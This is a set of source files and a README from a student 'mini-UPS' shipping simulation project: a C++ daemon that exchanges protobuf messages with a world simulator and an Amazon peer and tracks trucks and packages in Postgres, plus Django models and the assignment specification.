~Connector();\n};\n\n\n#endif\n" }, { "alpha_fraction": 0.7124541997909546, "alphanum_fraction": 0.7344322204589844, "avg_line_length": 
22.399999618530273, "blob_id": "9fa7437031e426402f2c7b557eeefa1bad35b981", "content_id": "eeab128d3d5802e6b6839301061cc2ae9965c580", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1638, "license_type": "no_license", "max_line_length": 56, "num_lines": 70, "path": "/Server-App/server/thread.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __THREAD__\n#define __THREAD__\n\n// PORT\n#define WORLD_HOST \"vcm-8273.vm.duke.edu\"\n// #define WORLD_HOST \"vcm-5947.vm.duke.edu\"\n#define WORLD_PORT \"12345\"\n#define AMAZON_HOST \"vcm-7975.vm.duke.edu\"\n// #define AMAZON_PORT \"22222\"\n#define TIME_RETRY 10\n#define NUM_TRUCKS 10\n\n// DATABSSE\n#define DBNAME \"ups_db\"\n#define USERNAME \"postgres\"\n#define PASSWORD \"password\"\n#define HOST \"db\"\n#define PORT \"5432\"\n\n// package status\n#define PACKAGE_PACKED \"PD\"\n#define PACKAGE_LOADING \"LG\"\n#define PACKAGE_LOADED \"LD\"\n#define PACKAGE_DELIVERING \"DG\"\n#define PACKAGE_DELIVERED \"DD\"\n\n// truck status\n#define TRUCK_IDLE \"ID\"\n#define TRUCK_TRAVELING \"TR\"\n#define TRUCK_ARRIVE_WAREHOUSE \"AW\"\n#define TRUCK_LOADING \"LO\"\n#define TRUCK_DELIVERING \"DE\"\n\n\n#include \"handle_requests.hpp\"\n#include \"amazonMsg.hpp\"\n#include \"worldMsg.hpp\"\n#include <cstdio>\n#include <cstdlib>\n#include <pqxx/pqxx>\n#include <iostream>\n#include <string>\n#include <thread> // std::thread\n#include <mutex> // std::mutex, std::lock_guard\n#include <unordered_map>\n#include <chrono>\n#include <thread>\n\nusing namespace std;\nusing namespace pqxx; \n\nstatic int worldId = -1;\nstatic connection * C;\nstatic mutex mtx;\nstatic int mySeqNum = 0;\n// static int myPackageNum = 0;\nstatic unordered_map<string, string> packageStatus;\nstatic unordered_map<string, string> truckStatus;\nstatic int countTruck = 0;\n\nvoid setUpEnvironment();\nvoid worldSide();\nvoid amazonSide();\nvoid initializeStatusMap();\nvoid iterateStatusMap();\nvoid iterateUResponses(UResponses & response);\nvoid iterateA2URequest(A2URequest & req);\nvoid updateAddress();\nvoid recvAdreUpdatedACK();\n#endif\n" }, { "alpha_fraction": 0.579033374786377, "alphanum_fraction": 0.5855003595352173, "avg_line_length": 36.466835021972656, "blob_id": "448c5248647c7b095be583d172de2bf0f06f7390", "content_id": "4595e55eb32b18afbabb283f41d28672bec0f547", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14694, "license_type": "no_license", "max_line_length": 136, "num_lines": 392, "path": "/Server-App/server/thread.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"thread.hpp\"\n\n \nvoid setUpEnvironment() {\n try {\n string connectionUrl = \"dbname=\"+string(DBNAME)+\" user=\"+USERNAME+\" password=\"+PASSWORD+\" host=\"+HOST;\n // string connectionUrl = \"dbname=\"+string(DBNAME)+\" user=\"+USERNAME+\" password=\"+PASSWORD;\n cout << connectionUrl << endl;\n C = new connection(connectionUrl);\n if (C->is_open()) {\n cout << \"Opened database successfully: \" << C->dbname() << endl;\n } else {\n cout << \"Can't open database\" << endl;\n exit(1);\n }\n // C->disconnect();\n } catch (const std::exception &e) {\n cerr << e.what() << std::endl;\n exit(1);\n }\n clear_all_tables(C);\n // initiaize seq and packid\n //int tempseq = max_sequence_num(C);\n // int temppack = max_package_num(C);\n // if (tempseq > 0) {\n // mySeqNum = tempseq + 1;\n // }\n // if (temppack > 0) {\n // myPackageNum = temppack + 1;\n // }\n \n // 
initialize status map\n initializeStatusMap();\n \n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT); // works\n amazonMsg * amazon = amazonMsg::getInstance();\n\n // connect and create a new world\n for (int i = 0; i < TIME_RETRY; i++) {\n if (i == TIME_RETRY) {\n perror(\"FAILED TO CONNECT TO WORLD\");\n exit(EXIT_FAILURE);\n }\n if (world->createWorld(false, worldId, true, NUM_TRUCKS, 0, 0, worldId, C)) { // works\n break;\n }\n }\n \n cout << \"newCreated World Id is \" << worldId << endl; \n \n // AMAZON reqired to test\n for (int i = 0; i < TIME_RETRY; i++) {\n if (i == TIME_RETRY) {\n perror(\"FAILED TO CONNECT TO AMAZON\");\n exit(EXIT_FAILURE);\n }\n if (amazon->buildConnection(worldId)) {\n cout << \"connected(amazon)!!!!!\";\n break;\n }\n }\n\n\n // cout << \"-----------------------------------------------\" << endl;\n // world->goPickUp(0, 1, 0); // tested\n // cout << \"-----------------------------------------------\" << endl;\n // world->goDeliver(1, 1, 1, 1, 1); // tested\n // cout << \"-----------------------------------------------\" << endl;\n // world->goQuery(1, 4); // tested\n // UResponses response1;\n // world->recvResponse(response1);\n // cout << \"-----------------------------------------------\" << endl;\n // UResponses response2;\n // world->goQuery(1, 3);\n // world->recvResponse(response2);\n // UResponses response;\n // world->changeSpeed(200);\n // world->recvResponse(response);\n // world->disconnect(true); // tested\n\n // set up DB Connection here\n \n // wait\n cout << \"accept\" << endl;\n amazon->acceptConnection();\n // cout << \"HIHIHIHI\" << endl;\n // drop_all_tables( C);\n}\n\nvoid initializeStatusMap() {\n truckStatus[\"IDLE\"] = \"ID\";\n truckStatus[\"TRAVELING\"] = \"TR\";\n // arrive warehouse\n truckStatus[\"ARRIVE WAREHOUSE\"] = \"AW\";\n truckStatus[\"LOADING\"] = \"LO\";\n truckStatus[\"DELIVERING\"] = \"DE\";\n packageStatus[\"loading\"] = \"LG\";\n packageStatus[\"loaded\"] = \"LD\";\n packageStatus[\"delivering\"] = \"DG\";\n packageStatus[\"delivered\"] = \"DD\";\n packageStatus[\"packed\"] = \"PD\";\n}\n\nvoid worldSide() {\n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n amazonMsg * amazon = amazonMsg::getInstance();\n while (true) {\n UResponses response;\n world->recvResponse(response);\n iterateUResponses(response); \n }\n}\n\nvoid iterateUResponses(UResponses & response) {\n \n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n amazonMsg * amazon = amazonMsg::getInstance();\n \n if (response.completions_size() != 0) { // handled\n for (int i = 0; i < response.completions_size(); i++) {\n // debug\n cout << \"completions sent back \" << endl;\n cout << \"truckId:\" << response.completions(i).truckid() << endl;\n cout << \"x:\" << response.completions(i).x() << endl;\n cout << \"y:\" << response.completions(i).y() << endl;\n cout << \"status:\" << response.completions(i).status() << endl;\n cout << \"seqnum:\" << response.completions(i).seqnum() << endl; \n cout << response.DebugString() << endl;\n // update db and send ack message\n world->sendAck(response.completions(i).seqnum());\n string thisTruckStatus = response.completions(i).status();\n int thisTruckId = response.completions(i).truckid();\n // cout << \"--------------------------\" << endl;\n // cout << thisTruckStatus << endl;\n // ARRIVE WAREHOUSE\n if (thisTruckStatus == \"ARRIVE WAREHOUSE\") {\n\t// cout << \"--------------------------\" << endl;\n\tvector<int> packed;\n\tpacked_packages(C, packed, 
to_string(response.completions(i).x()), to_string(response.completions(i).y()), to_string(thisTruckId));\n\t// cout << \"--------------------------\" << endl;\n\t// cout << \"packed size \" << packed.size() << endl;\n\t// cout << response.completions(i).x() << endl;\n\t// cout << response.completions(i).y() << endl;\n\t// cout << response.completions(i).truckid() << endl;\n\tlock_guard<mutex> lock(mtx);\n\tfor (unsigned i = 0; i < packed.size(); i++) {\n\t  // int tempPackageId = get_order_id_for_package(C, packed[i]);\n\t  int tempOrderId = stoi(get_order_id_for_package(C, to_string(packed[i])));\n\t  update_status_of_package(C, to_string(packed[i]), PACKAGE_LOADING);\n\t  amazon->pickUpRes(mySeqNum, packed[i], tempOrderId, thisTruckId);\n\t  // amazon->updateDestination(444, packed[i], 3, 3);\n\t  insert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t  ++mySeqNum;\n\t  // ++myPackageNum\n\t}\n      }\n      update_truck_status(C, to_string(response.completions(i).truckid()), truckStatus[response.completions(i).status()]);\n      // update_truck_status(C, string(3), statusMap[response.completions(i).status()]);\n      // (this completion was already acked at the top of the loop)\n    } \n  }\n\n  if (response.delivered_size() != 0) {\n    for (int i = 0; i < response.delivered_size(); i++) {\n      // update\n      // update(packageid, status);\n      cout << \"delivered sent back \" << endl;\n      cout << \"truckId:\" << response.delivered(i).truckid() << endl;\n      cout << \"packageId:\" << response.delivered(i).packageid() << endl;\n      cout << \"seqnum:\" << response.delivered(i).seqnum() << endl;\n      // todo : function(packageId) // set the foreign key(points to truck) of the packageid to null\n      update_status_of_package(C, to_string(response.delivered(i).packageid()), PACKAGE_DELIVERED);\n      world->sendAck(response.delivered(i).seqnum());\n      // send amazon\n      lock_guard<mutex> lck(mtx);\n      amazon->deliverRes(mySeqNum, response.delivered(i).packageid());\n      insert_sequence_num(C, to_string(mySeqNum), \"False\");\n      mySeqNum++;\n    }\n  } \n\n  if (response.truckstatus_size() != 0) {\n    for (int i = 0; i < response.truckstatus_size(); i++) {\n      cout << \"truck status sent back\" << endl;\n      cout << response.truckstatus(i).truckid() << endl;\n      cout << response.truckstatus(i).status() << endl;\n      cout << response.truckstatus(i).x() << endl;\n      cout << response.truckstatus(i).y() << endl;\n      cout << response.truckstatus(i).seqnum() << endl;\n      // update(int truckId, int x, int y, string status); \n      update_truck_status(C, to_string(response.truckstatus(i).truckid()), truckStatus[response.truckstatus(i).status()]);\n      world->sendAck(response.truckstatus(i).seqnum());\n    }\n  }\n\n  \n  if (response.error_size() != 0) { // error : do nothing\n    for (int i = 0; i < response.error_size(); i++) {\n      cout << \"error sent back \" << endl;\n      cout << response.error(i).err() << endl;\n      cout << response.error(i).originseqnum() << endl;\n      cout << response.error(i).seqnum() << endl;\n      world->sendAck(response.error(i).seqnum());\n    }\n  }\n\n  if (response.has_finished()) { // I will never send disconnect\n    cout << \"finished sent back \" << response.finished() << endl;\n  }\n  \n  if (response.acks_size() != 0) {\n    for (int i = 0; i < response.acks_size(); i++) {\n      cout << \"ack sent back\" << endl;\n      cout << response.acks(i) << endl;\n      // todo: update the corresponding seqnum to acked\n      update_acked_of_seqnum(C, to_string(response.acks(i)), true);\n    }\n  } \n}\n\nvoid amazonSide() {\n  worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n  amazonMsg * amazon = amazonMsg::getInstance();\n  
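// The blocking receive loop below mirrors worldSide(): each A2URequest batch is\n  // dispatched by iterateA2URequest(), which acks every incoming seqnum once and\n  // records our outbound seqnums via insert_sequence_num() until Amazon acks them.\n  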
while (true) {\n    A2URequest req;\n    amazon->receiveRes(req);\n    iterateA2URequest(req);\n  }\n}\n\nvoid iterateA2URequest(A2URequest & req) {\n  worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n  amazonMsg * amazon = amazonMsg::getInstance();\n\n  if (req.pickup_size() != 0) {\n    for (int i = 0; i < req.pickup_size(); i++) {\n      cout << \"pickup request from amazon\" << endl;\n      cout << req.pickup(i).seqnum() << endl;\n      cout << req.pickup(i).orderid() << endl;\n      cout << req.pickup(i).productname() << endl;\n      cout << req.pickup(i).wh_id() << endl;\n      cout << req.pickup(i).wh_x() << endl;\n      cout << req.pickup(i).wh_y() << endl;\n      cout << req.pickup(i).dest_x() << endl;\n      cout << req.pickup(i).dest_y() << endl;\n\n      string account = \"\";\n      if (req.pickup(i).has_upsaccount()) {\n\tcout << req.pickup(i).upsaccount() << endl;\n\taccount = req.pickup(i).upsaccount();\n      }\n      \n      lock_guard<mutex> lck(mtx);\n      amazon->sendAck(req.pickup(i).seqnum());\n      \n      // create the package in local database and assign the package to a truck\n      if (req.pickup(i).has_upsaccount() && !isExist(C, account)) {\n\tcout << \"The user account does not exist\" << endl;\n\t// was req.delivery(i).seqnum(), which indexed the wrong repeated field\n\tamazon->sendError(\"account not exist\", req.pickup(i).seqnum(), mySeqNum);\n\tinsert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t++mySeqNum;\n\tcontinue;\n      }\n      int truckIdAssigned = countTruck % NUM_TRUCKS;\n      ++countTruck;\n      cout << account << endl;\n      // was to_string(to_string(...)), which does not compile\n      insert_package(C, to_string(req.pickup(i).orderid()), account, to_string(truckIdAssigned), req.pickup(i).productname(),\n\t\t     PACKAGE_PACKED, to_string(req.pickup(i).wh_id()), to_string(req.pickup(i).wh_x()),\n\t\t     to_string(req.pickup(i).wh_y()), to_string(req.pickup(i).dest_x()), to_string(req.pickup(i).dest_y()), \"False\");\n      \n      insert_into_order_table(C, to_string(req.pickup(i).orderid()), to_string(req.pickup(i).orderid()));\n      // update the truck status\n      update_truck_status(C, to_string(truckIdAssigned), TRUCK_TRAVELING);\n      // update_status_of_package(C, myPackageNum, \"PD\");\n      // send the message to truck\n\n      cout << \"assigned truck \" << truckIdAssigned << endl;\n      world->goPickUp(truckIdAssigned, req.pickup(i).wh_id(), mySeqNum);\n      insert_sequence_num(C, to_string(mySeqNum), \"False\");\n      ++mySeqNum;\n      // ++myPackageNum;\n    }\n  }\n\n  if (req.ack_size() != 0) {\n    for (int i = 0; i < req.ack_size(); i++) {\n      cout << \"ack from amazon\" << endl;\n      cout << req.ack(i) << endl;\n      update_acked_of_seqnum(C, to_string(req.ack(i)), true);\n    }\n  }\n\n  // message DeliveryRequest{\n  // 	 required int64 seqnum = 1;\n  // 	 required int64 tracknum = 2;\n  // }\n\n  if (req.delivery_size() != 0) {\n    for (int i = 0; i < req.delivery_size(); i++) {\n      cout << \"delivery request from amazon\" << endl;\n      cout << req.delivery(i).seqnum() << endl;\n      cout << req.delivery(i).tracknum() << endl;\n      // local\n      lock_guard<mutex> lck(mtx);\n      amazon->sendAck(req.delivery(i).seqnum());\n      // packageExist(connection * C, string packageid)\n      if (!packageExist(C, to_string(req.delivery(i).tracknum()))) {\n\tamazon->sendError(\"The track number does not exist\", req.delivery(i).seqnum(), mySeqNum);\n\tinsert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t++mySeqNum;\n\tcontinue;\n      }\n      string tempId = get_truck_id_for_a_particular_package(C, to_string(req.delivery(i).tracknum()));\n      update_status_of_package(C, to_string(req.delivery(i).tracknum()), PACKAGE_DELIVERING);\n      update_truck_status(C, tempId, TRUCK_DELIVERING);\n      // remote\n      // todo : Select xPosition, yPosition from Package where PackageId = x\n      int x = stoi(get_xposition_of_a_package(C, to_string(req.delivery(i).tracknum())));\n      int y = stoi(get_yposition_of_a_package(C, to_string(req.delivery(i).tracknum())));\n      // worldMsg::goDeliver(int packageid, int x, int y, int truckid, int seqnum)\n      // cout << \"----------------\" << endl;\n      // cout << req.delivery(i).tracknum() << endl;\n      // cout << x << endl;\n      // cout << y << endl;\n      // cout << stoi(tempId) << endl;\n      // cout << mySeqNum << endl;\n      world->goDeliver(req.delivery(i).tracknum(), x, y, stoi(tempId), mySeqNum);\n      insert_sequence_num(C, to_string(mySeqNum), \"False\");\n      ++mySeqNum;\n    }\n  } \n}\n \nvoid updateAddress() {\n  amazonMsg * amazon = amazonMsg::getInstance();\n  worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n  while (true) {\n    this_thread::sleep_for(chrono::milliseconds(3000)); // poll every 3s instead of busy-waiting\n    vector<vector<string>> my_vec(1000);\n    // package id, x, y\n    get_parameter_based_on_dest(C, my_vec); // fetch packages whose destination needs updating\n    if (my_vec.size() == 0) {\n\tcontinue;\n    }\n    lock_guard<mutex> lck(mtx);\n    for (unsigned i = 0; i < my_vec.size(); i++) {\n\tfor (int j = 0; j < 3; j++) {\n\t  //world->updateDestination(mySeqNum, stoi(my_vec[i][0]), stoi(my_vec[i][1]), stoi(my_vec[i][2]));\n\t  int findTruckId = stoi(get_truck_id_for_a_particular_package(C, my_vec[i][0]));\n\t  string curStatus = get_package_status(C, my_vec[i][0]);\n\t  if (curStatus == \"DD\" ) {\n\t    cout << \"Already Delivered : Update Address Failed\" << endl;\n\t    continue;\n\t  }\n\t  if (curStatus == \"DG\") {\n\t    world->goDeliver(stoi(my_vec[i][0]), stoi(my_vec[i][1]), stoi(my_vec[i][2]), findTruckId, mySeqNum);\n\t    insert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t    ++mySeqNum;\n\t  }\n\t  amazon->updateDestination(mySeqNum, stoi(my_vec[i][0]), stoi(my_vec[i][1]), stoi(my_vec[i][2]));\n\t  insert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t  ++mySeqNum;\n\t}\n    }\n  }\n}\n\nvoid recvAdreUpdatedACK() {\n  amazonMsg * amazon = amazonMsg::getInstance();\n  while (true) {\n    A2UResponse response;\n    amazon->receiveDestUpdatedRes(response); \n    if (response.error_size() != 0) {\n      for (int i = 0; i < response.error_size(); i++) {\n        cout << \"error message from amazon (dest-update channel)\" << endl;\n        cout << response.error(i).err() << endl;\n        cout << response.error(i).originseqnum() << endl;\n        cout << response.error(i).seqnum() << endl;\n        amazon->sendAck22222(response.error(i).seqnum());\n      }\n    }\n\n    if (response.ack_size() != 0) {\n      for (int i = 0; i < response.ack_size(); i++) {\n        cout << \"ack from amazon (dest-update channel)\" << endl;\n        cout << response.ack(i) << endl;\n        update_acked_of_seqnum(C, to_string(response.ack(i)), true);\n      }\n    } \n  }\n}\n" }, { "alpha_fraction": 0.6011844277381897, "alphanum_fraction": 0.6106598973274231, "avg_line_length": 30.37974739074707, "blob_id": "c793e251d86f9c4851cad4d2a4e0372ffa76d524", "content_id": "c894759cbfe15f77e45dca9271b99b61cacb73bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2479, "license_type": "no_license", "max_line_length": 80, "num_lines": 79, "path": "/Django-App/web-app/upsApp/models.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\nfrom django.contrib.auth.models import User\n\nclass Truck(models.Model):\n    truckId = models.PositiveIntegerField(blank = False, primary_key = True)\n    STATUS_CHOICE = (\n        ('ID', 'idle'),\n        ('TR', 'traveling'),\n        ('AW', 'arrive warehouse'),\n        ('LO', 'loading'),\n        ('DE', 'delivering'),\n    )\n    
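# the two-letter codes here and on Package.status mirror the status constants\n    # in Server-App/server/thread.hpp, which is how the C++ daemon stays in sync\n    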
status = models.CharField (\n        max_length = 20, \n        choices = STATUS_CHOICE, \n        default = 'ID',\n    )\n    def __str__(self):\n        return \"the truckId of this truck is %s\" % (self.truckId)\n\n\nclass Package(models.Model):\n    packageId = models.PositiveIntegerField(blank = False, primary_key = True)\n    xPosition = models.IntegerField(default = 0, blank = False, null = True)\n    yPosition = models.IntegerField(default = 0, blank = False, null = True)\n    item = models.CharField(max_length = 200, blank = True, null = True)\n    whid = models.PositiveIntegerField(default = 0, blank = False)\n    whxPosition = models.IntegerField(default = 0, blank = False)\n    whyPosition = models.IntegerField(default = 0, blank = False)\n    destRequiredUpdated = models.BooleanField(default = False)\n    owner = models.ForeignKey (\n        User,\n        related_name = 'owner_package_set',\n        on_delete = models.SET_NULL,\n        blank = True,\n        null = True,\n    )\n    truck = models.ForeignKey (\n        Truck, \n        blank = True,\n        null = True,\n        on_delete = models.SET_NULL,\n        related_name = 'truck_package_set'\n    )\n    STATUS_CHOICE = (\n        ('PD', 'packed'),\n        ('LG', 'loading'),\n        ('LD', 'loaded'),\n        ('DG', 'delivering'),\n        ('DD', 'delivered'),\n    )\n    status = models.CharField (\n        max_length = 20, \n        choices = STATUS_CHOICE, \n        default = 'DG',\n    )\n    def __str__(self):\n        return \"the packageId of this package is %s\" % (self.packageId)\n\n\n\nclass current_world(models.Model):\n    name = models.CharField(max_length=30,null=True,default=\"current_world\")\n    worldid = models.CharField(max_length=30,null=True)\n\n\nclass sequence_number(models.Model):\n    sequence_id = models.PositiveIntegerField(blank = False, primary_key = True)\n    ackedornot = models.BooleanField(default = False)\n\nclass order_table(models.Model):\n    order_id = models.PositiveIntegerField(blank = False, primary_key = True)\n    package_num = models.OneToOneField(\n        Package,\n        on_delete = models.CASCADE,\n        unique = True\n    )\n" }, { "alpha_fraction": 0.6438679099082947, "alphanum_fraction": 0.6627358198165894, "avg_line_length": 17.66666603088379, "blob_id": "eab823f65ed74f50cc904e1f7deeea51621db970", "content_id": "12792c32d8dc127f62d4b4b0b0cff157b922cdf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 424, "license_type": "no_license", "max_line_length": 33, "num_lines": 24, "path": "/Server-App/server/main.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"socket.hpp\"\n#include \"worldMsg.hpp\"\n#include \"thread.hpp\"\n#include <cstdlib>\n#include <cstdio>\n#include <iostream>\n#include <thread> \n\nusing namespace std;\n\nint main() {\n  setUpEnvironment();  \n  thread th1(worldSide); \n  thread th2(amazonSide);\n  thread th3(updateAddress);\n  thread th4(recvAdreUpdatedACK);\n  th1.join();\n  th2.join();\n  th3.join();\n  th4.join();\n  // note: the worker threads loop forever, so the joins above never return\n  cout << \"Hello\" << endl;\n  while (true) {\n  }\n}\n" }, { "alpha_fraction": 0.7749814391136169, "alphanum_fraction": 0.7786980867385864, "avg_line_length": 69.79698944091797, "blob_id": "9eb1c384974d25c58c3facaf1474115850edff15", "content_id": "cbe8bf2a0b6151ad56547455057787e75c2ae13a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9497, "license_type": "no_license", "max_line_length": 186, "num_lines": 133, "path": "/README.md", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "# UPS\n\nFor this project, you will either be doing “mini-Amazon” (an online store) or “mini-UPS” (a\nshipping website). If you are doing Amazon, you will have to make your system work with the\nUPS systems in your interoperability group (IG)—2 groups doing Amazon and 2 groups doing UPS.\n\nThe “World”\n----------\nSince you won’t have access to real warehouses and trucks, your code will interact with a\nsimulated world provided for you. You will connect to the simulation server (port 12345 for UPS,\nport 23456 for Amazon), and send commands and receive notifications.\nThe messages you can send and receive are in the .proto files (amazon.proto and ups.proto)\nthat will be provided. Notice that all messages either start with A or U to indicate which part they\nbelong to.\nThe server supports different worlds (identified by a 64-bit number). You may create as many\nworlds as you want. There is presently no authentication on the worlds, so please only use your\nown. To create a new world for a pair of Amazon and UPS, UPS should send a UConnect request\nwithout specifying a worldid number, so that the World Simulator would create one and return\nits ID in the UConnected response. Note only UPS can create a new world, and only when you want\nto create a new world do you leave the worldid blank.\nEach world is comprised of a Cartesian coordinate grid where “addresses” are integer coordinates (so you will deliver a package to e.g., (2, 4)). The world contains trucks (controlled by\nUPS) and warehouses (controlled by Amazon). These have to work together to deliver packages.\nThe basic flow is that you send an A/UConnect message with the worldid that you want and\nreceive an A/UConnected response. Note only ONE Amazon and ONE UPS are allowed to connect\nto a world at the same time. Upon successful connection, the result string in A/UConnected will\nbe “connected!”, otherwise it will be an error message starting with “error:”. Make sure your\nresult string is “connected!” before proceeding to any further actions. Once you have\nreceived this response, you may send A/UCommands and receive A/UResponses. You should not\nsend any other message, nor expect to receive any – all of the details are embedded in the\nA/UCommands/Responses.\nA/UCommands include two common options: simspeed and disconnect. You can adjust the\nsimulation speed (higher numbers make things happen more quickly in the world). Simulation\nspeed has a default value of 100 and stays at the value you specify until you change it to\nanother value. Note that the simulation speed only affects future events. If you set\ndisconnect to true in a command, the server will finish processing whatever it is currently \nworking on (your current A/UCommands), then send a response with finished = true,\nand close the connection.\nA/UCommands and A/UResponses also implement ack numbers to avoid losing an in-flight\nmessage. The ack mechanism works as follows. For each request inside A/UCommands, there’s\na seqnum (you should keep track of the incrementing seqnums coming from your side). When\nWorld Simulator receives commands from your side, it will check the seqnum of each request.\nThen it will process the request and return responses with acks of those seqnums. The same\nthing happens when World Simulator sends you responses, which means if you don’t return an ack,\nWorld Simulator will resend the same responses multiple times. Don’t assume World Simulator\nreceives all of the requests in your A/UCommands until you receive those acks.\n
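\nTo make the ack mechanism above concrete, here is a hedged sketch of at-least-once bookkeeping keyed on seqnums, in the spirit of the insert_sequence_num/update_acked_of_seqnum helpers this repo's server uses (PendingStore itself is illustrative, not part of the spec or the repo):\n\n```cpp\n#include <cstdint>\n#include <unordered_map>\n\n// Track every outbound command batch until the simulator acks its seqnum.\nstruct PendingStore {\n  std::unordered_map<int64_t, UCommands> pending; // seqnum -> command batch\n  void sent(int64_t seq, const UCommands & cmd) { pending[seq] = cmd; }\n  void acked(int64_t seq) { pending.erase(seq); }\n  // Anything still present after a timeout is eligible for retransmission;\n  // symmetrically, the simulator resends its responses until it sees our acks.\n};\n```\n\n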
Note: simspeed is only for testing/debugging. You MUST NOT rely on a particular simspeed for\nthe correctness of your program. When testing/debugging, if you want to try a large number of\nactions quickly, you might set it high. Likewise, if you wish to exercise particular timing-related\nconditions, you might set it slow. Your program MUST work correctly at ANY simspeed the TAs\nuse. They will have a version of the world server which ignores simspeed commands that you\nsend and allows them to set the speed directly.\n\n\nAmazon Commands details: (note all commands include a sequence number for\nacknowledgement as described above)\n--------------------------------------------------------------------------\n\n1. **buy** You can ask for more of some products to be delivered to a warehouse. Specify item id,\ndescription (any text) and the quantity you want. If this product has never been seen before,\nit will be created. If the product has been seen before, you SHOULD provide the same\ndescription (if you use different descriptions for the same product id, the behavior is\nundefined). NOTE: buying new stock does not involve UPS.\n2. **topack** Pack a shipment for delivery. You will be notified when it is ready. The warehouse that\nyou request to pack the shipment MUST have sufficient inventory (and the inventory will be\nreduced accordingly).\n3. **load** Load a shipment onto a truck. In order for this to succeed, the shipment MUST be packed\n(and you must have received a ready notification) AND the truck MUST be at the warehouse,\nready to receive the shipment (the shipper must have sent them to pickup and they must\nhave received notification of completion).\n4. **queries** - ask the status of a package by specifying the packageid. Note you can do a query at any\ntime.\n\nAmazon Response details: \n-----------------------\n1. **arrived** - When you buy, you will later get a notification that your orders have arrived. At this time,\nyou should update your records of what is in stock and may use the goods described in this\nmessage to fulfill orders.\n2. **ready** - Notification that packing is complete\n3. **loaded** - Notification that you have finished loading a shipment onto a truck\n4. **packagestatus** - tells the current status of one package that you queried. Possible package status:\npacking, packed, loading, loaded, delivering, delivered.\n5. **error** - indicates that you failed to meet any of the MUST requirements specified at “Amazon\nCommands details” above. Read the err string carefully for more information.\n\n\nUPS Command details:\n-------------------\n1. **deliveries** - Once a package has been loaded, you can issue this command to send the truck to\ndeliver it to a particular location. Note that you MAY pickup other packages before making\ndeliveries. You MAY send more deliveries requests while the truck is delivering other\npackages. You MAY even change the destination of a package by sending a delivery request\nagain before it arrives at its destination. World Simulator allows an idle truck to carry undelivered\npackages. If you specify multiple deliveries at once, they will be performed in the order you\nlist them in the command.\n2. **pickups** - Send a truck to a warehouse to pick up a package. The truck need not have an “idle”\nstatus; it can also have an “arrive warehouse” or “delivering” status. If a truck receives\npickups requests in the middle of a delivery, it will immediately quit the current delivery\nand turn to the specified warehouse. Later whenever the truck has a “delivering” status\nagain, it always resumes from where it quit. The package need not be ready to issue this\ncommand. 
While the truck is en route, it is busy and cannot be given other commands.\n\n3. **queries** - ask the status of a truck by specifying truckid. Note you can do a query at any time.\n\nUPS Response details:\n--------------------\n\n1. **completions** - You will receive this notification when either (a) a truck reaches the warehouse you\nsent it to (with a pickup command) and is ready to load a package or (b) a truck has finished\nall of its deliveries (that you sent it to make with a deliveries command).\nAt this point the truck may be given other instructions. Note that the completion tells you\nthe current location of the truck. \n2. **delivered** - You will receive this notification when each package is delivered. Note that when each\npackage is delivered, a delivered response will be sent. When all deliveries are finished,\nyou will receive a completions response.\n3. **truckstatus** - tells the current status of a truck that you queried. Possible truck status: idle, traveling\n(when it receives pickups requests and is on its way to a warehouse), arrive warehouse, loading\n(loading a package; after loading finishes, it goes back to the “arrive warehouse” status),\ndelivering (when it finishes all delivery jobs, it goes to the “idle” status).\n4. **error** indicates that you failed to meet any of the MUST requirements specified at “UPS\nCommands details” above. Read the err string carefully for more information.\n\n\nNote World Simulator has a time-out value set to 10 mins; if you find that you lose the\nconnection, don’t panic, just connect again.\nNote that the world server’s replies are asynchronous. You may send several requests and receive the\nreplies many minutes later. You should use appropriate identifiers in the responses to figure out\nwhat request a message is in response to. You also MUST NOT wait for the response to return a\nweb page – if the response takes a few minutes, the browser will time out.\nYou MAY wish to separate the handling of world server communication from the handling of the\nweb front end (hint: good idea). You could even go so far as placing the web server in a different\nDocker container from the daemon which interacts with the world server. In such a design, both\nprograms can communicate through a common postgres database. You might even write these\npieces of software in different languages. 
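\nPutting the connect handshake and the two UPS commands above together, here is a minimal happy-path sketch using the worldMsg wrapper defined in this repo (createWorld/goPickUp/goDeliver/recvResponse as declared in worldMsg.hpp); truck 0, warehouse 1, package 7, destination (3,4) and the seqnums are arbitrary, and C is the open pqxx connection from thread.cpp:\n\n```cpp\n// Hedged sketch of one pickup-then-deliver cycle against the world simulator.\nvoid demoCycle(connection * C) {\n  int newWorldId = -1;\n  worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n  world->createWorld(false /*isAmazon*/, -1, true /*create new world*/, NUM_TRUCKS, 0, 0, newWorldId, C);\n\n  world->goPickUp(0 /*truckid*/, 1 /*whid*/, 0 /*seqnum*/); // truck 0 -> warehouse 1\n  UResponses resp;\n  world->recvResponse(resp); // expect a completion: truck arrived, ready to load\n  // ... Amazon loads the package, then:\n  world->goDeliver(7 /*packageid*/, 3, 4, 0 /*truckid*/, 1 /*seqnum*/);\n  world->recvResponse(resp); // expect delivered, then a completion\n}\n```\n\nThis is exactly the two-process split this repo adopts: the daemon above writes package/truck rows to postgres, and the Django front end only reads and edits those rows.\n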
